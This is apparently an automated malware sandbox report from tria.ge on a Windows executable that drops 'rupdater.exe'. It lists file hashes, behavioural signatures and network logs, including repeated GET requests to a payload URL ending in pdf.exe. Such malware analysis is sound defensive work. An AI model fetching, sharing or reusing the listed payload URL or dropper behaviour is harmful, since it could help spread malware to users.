Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

cb6827ac3d...76.exe

windows7-x64

8

cb6827ac3d...76.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    116s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/10/2022, 21:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76.exe

  • Size

    18KB

  • MD5

    a0beac55bb85e9beedd1fb3df64d4890

  • SHA1

    a26c0417c08dc463f71cc3ebb688f4261d90f586

  • SHA256

    cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76

  • SHA512

    215e7ee11eb7b08c3b386d20d1c95ca65439bad1fee8464db7f21d33db1ab79abf4ac9e35a1dfa36d4291eb7827a7ee33b25a05513d7ee6bb438ca4a78efcf3e

  • SSDEEP

    192:ZdSekEVgsoqe0jc1M7cLa2gcKiQWm/L32S5WpkdbXftbrsY5s:ZdSeP+M7cWoKiQ/iSU6dbXlbrsYO

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76.exe
    "C:\Users\Admin\AppData\Local\Temp\cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Users\Admin\AppData\Local\Temp\rupdater.exe
      "C:\Users\Admin\AppData\Local\Temp\rupdater.exe"
      2⤵
      • Executes dropped EXE
      PID:4952

Network

  • flag-us
    DNS
    smokefreesource.com
    rupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    smokefreesource.com
    IN A
    Response
  • flag-us
    DNS
    mtnoutfitters.com
    rupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    mtnoutfitters.com
    IN A
    Response
    mtnoutfitters.com
    IN A
    162.159.129.85
    mtnoutfitters.com
    IN A
    162.159.130.85
  • flag-us
    GET
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    rupdater.exe
    Remote address:
    162.159.129.85:443
    Request
    GET /wp-content/uploads/2013/01/pdf.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: mtnoutfitters.com
    Cache-Control: no-cache
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 20 Oct 2022 02:30:32 GMT
    Content-Type: text/html;charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    p3p: CP="ALL PUR DSP CUR ADMi DEVi CONi OUR COR IND"
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-ua-compatible: IE=Edge,chrome=1
    x-xss-protection: 1; mode=block
    x-developer: Page: 5.0ms, Render: 0.0ms, Mem: 2,048kB, Cache: 0Q (0.0ms), DB: 0Q (0.0ms), Prop: 0Q (0.0ms)
    x-runtime: 0.005036
    x-shop-id:
    cache-control: no-cache
    vary: Accept-Encoding
    x-served-by: prd-us-east4-ecom-web-04
    x-request-id: Y1CyyBC@mrwOTxx4Z41GLwAAIMc
    via: 1.1 google
    x-envoy-upstream-service-time: 10
    CF-Cache-Status: MISS
    Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 75ce55046a19b987-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    DNS
    smokefreesource.com
    rupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    smokefreesource.com
    IN A
    Response
  • flag-us
    GET
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    rupdater.exe
    Remote address:
    162.159.129.85:443
    Request
    GET /wp-content/uploads/2013/01/pdf.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: mtnoutfitters.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 20 Oct 2022 02:30:32 GMT
    Content-Type: text/html;charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    p3p: CP="ALL PUR DSP CUR ADMi DEVi CONi OUR COR IND"
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-ua-compatible: IE=Edge,chrome=1
    x-xss-protection: 1; mode=block
    x-developer: Page: 4.5ms, Render: 0.0ms, Mem: 2,048kB, Cache: 0Q (0.0ms), DB: 0Q (0.0ms), Prop: 0Q (0.0ms)
    x-runtime: 0.004567
    x-shop-id:
    cache-control: no-cache
    vary: Accept-Encoding
    x-served-by: prd-us-east4-ecom-web-01
    x-request-id: Y1CyyNdTzIl3JKkWI0mOBQAAIAQ
    via: 1.1 google
    x-envoy-upstream-service-time: 8
    CF-Cache-Status: MISS
    Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 75ce55062868b8c6-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    DNS
    97.97.242.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.97.242.52.in-addr.arpa
    IN PTR
    Response
  • 162.159.129.85:443
    mtnoutfitters.com
    tls
    rupdater.exe
    639 B
     2.8kB
     8
    7
  • 52.168.117.170:443
    322 B
     7
  • 8.252.51.254:80
    322 B
     7
  • 8.253.183.120:80
    322 B
     7
  • 104.80.225.205:443
    322 B
     7
  • 209.197.3.8:80
    322 B
     7
  • 162.159.129.85:443
    mtnoutfitters.com
    tls
    rupdater.exe
    406 B
     219 B
     6
    5
  • 162.159.129.85:443
    mtnoutfitters.com
    rupdater.exe
    190 B
     92 B
     4
    2
  • 162.159.129.85:443
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    tls, http
    rupdater.exe
    1.8kB
     22.9kB
     28
    27

    HTTP Request

    GET https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe

    HTTP Response

    404
  • 162.159.129.85:443
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    tls, http
    rupdater.exe
    1.9kB
     20.2kB
     29
    28

    HTTP Request

    GET https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe

    HTTP Response

    404
  • 8.8.8.8:53
    smokefreesource.com
    dns
    rupdater.exe
    65 B
     138 B
     1
    1

    DNS Request

    smokefreesource.com

  • 8.8.8.8:53
    mtnoutfitters.com
    dns
    rupdater.exe
    63 B
     95 B
     1
    1

    DNS Request

    mtnoutfitters.com

    DNS Response

    162.159.129.85
    162.159.130.85

  • 8.8.8.8:53
    smokefreesource.com
    dns
    rupdater.exe
    65 B
     138 B
     1
    1

    DNS Request

    smokefreesource.com

  • 8.8.8.8:53
    97.97.242.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    97.97.242.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\rupdater.exe
    Filesize

    19KB

    MD5

    3a24f085d1444fec030d23356df55ad7

    SHA1

    42b49e93299a4e9b521da5c336d49add52b4955b

    SHA256

    a6df2f7ded81285b9ccbdafdf52ec95a8a995d3bf5c53d7f9935c725c8ee8c1f

    SHA512

    b19e42eec4b2d781a6c9e0d20da627a09cbbdc9f787bc6d2d134b8f99396b0dcb7038fd3bde5d4f595f99a80478fc347aa83e0550a8c167cb6524cfce5360173

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\rupdater.exe
    Filesize

    19KB

    MD5

    3a24f085d1444fec030d23356df55ad7

    SHA1

    42b49e93299a4e9b521da5c336d49add52b4955b

    SHA256

    a6df2f7ded81285b9ccbdafdf52ec95a8a995d3bf5c53d7f9935c725c8ee8c1f

    SHA512

    b19e42eec4b2d781a6c9e0d20da627a09cbbdc9f787bc6d2d134b8f99396b0dcb7038fd3bde5d4f595f99a80478fc347aa83e0550a8c167cb6524cfce5360173

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.